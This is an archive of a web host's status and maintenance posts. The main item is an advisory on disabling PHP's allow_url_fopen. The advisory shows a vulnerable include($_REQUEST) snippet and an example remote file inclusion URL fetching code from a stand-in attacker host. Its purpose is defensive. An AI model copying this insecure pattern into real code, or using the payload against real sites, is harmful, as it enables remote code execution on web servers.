Archive for the ‘UK - Derby’ Category

UK – Service Modifications 01/03/2010 onwards [allow_url_fopen]

Monday, February 22nd, 2010

Brief: On Monday March 1st we will be changing a php.ini configuration option on all of our shared and reseller hosting servers which may affect your website code.

(more…)

Posted in Linux & PHP, Security, UK - Derby, UK - Sheffield | No Comments »

UK – Maintenance Notice – 09/01/2010 [control panel]

Friday, January 8th, 2010

Upgrade completed without problems, maintenance closed.
(more…)

Posted in General, UK - Derby, UK - Sheffield | No Comments »

UK – Maintenance Notice – 26/12/2009 [mail]

Friday, December 18th, 2009

Closed.
(more…)

Posted in UK - Derby, UK - Sheffield | No Comments »

UK – Maintenance Notice 05/11/2009 [webmail]

Thursday, October 22nd, 2009

Closed.

(more…)

Posted in Email, UK - Derby, UK - Sheffield | No Comments »

UK – Maintenance Notice – 15/10/2009

Thursday, October 15th, 2009

Closed.

(more…)

Posted in UK - Derby, UK - Sheffield | No Comments »

UK – Maintenance Notice 24/09/2009

Tuesday, September 22nd, 2009

Closed.
(more…)

Posted in Network & DNS, UK - Derby, UK - Sheffield | 2 Comments »

UK – Maintenance Notice 17/09/2009

Wednesday, August 12th, 2009

Closed.
(more…)

Posted in UK - Derby, UK - Sheffield | No Comments »

UK – Mail Maintenance – 11/08/2009

Friday, August 7th, 2009

Closed.
(more…)

Posted in UK - Derby, UK - Sheffield | No Comments »

Emergency SMS pre-registration

Friday, March 27th, 2009

We are now accepting subscriptions to our new emergency SMS notification system which is intended to keep customers directly informed in the event of any problems, outages or other urgent events.

Register now for SMS notifications

Posted in IE - Dublin, UK - Derby, UK - Sheffield, US - Enom | No Comments »

UK – Service Modifications 24/11/2008 onwards

Saturday, November 15th, 2008

Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.

Currently all Shared and Reseller Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile(“http://feeds.feedburner.com/DilbertDailyStrip”);

to retrieve a remote RSS feed will no longer work.

What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php

Posted in UK - Derby, UK - Sheffield | No Comments »